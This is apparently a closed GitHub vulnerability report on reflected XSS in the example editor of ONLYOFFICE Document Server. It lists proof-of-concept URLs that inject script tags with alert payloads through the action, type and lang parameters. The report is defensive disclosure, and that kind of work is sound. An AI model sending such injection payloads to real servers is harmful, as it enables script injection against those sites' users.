[Vulnerability Report] XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 , allows remote attackers inject arbitrary HTML or JavaScript
#252
Closed
Bruce-C1 opened this issue
Jan 28, 2022
· 1 comment
· Fixed by #253
In this scenario, the example is used to exploit this vulnerability, but it is a code example of a Document Management System that is used for testing purposes only and is not used in a production environment.
Document Server's example is disabled by default and is not accessible without enabling it first.
There is no such vulnerability present in a fully-fledged and integrated Document Server.
Vulnerability Summary
XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 , allows remote attackers inject arbitrary HTML or JavaScript.
Vulnerability Url
http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability Description
The XSS vulnerability is in several parameters of the path ‘/example/editor’ in ONLYOFFICE Document Server before v7.0.0.
Test Server Version: 7.0.0 Build:132
##Steps To Reproduce


Vulnerability param: action
Vulnerability URL:
http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability param: type


Vulnerability URL:
http://server.domainexample/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability param: lang


Vulnerability URL:
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability Solution
Close the test example in Document Server
The text was updated successfully, but these errors were encountered: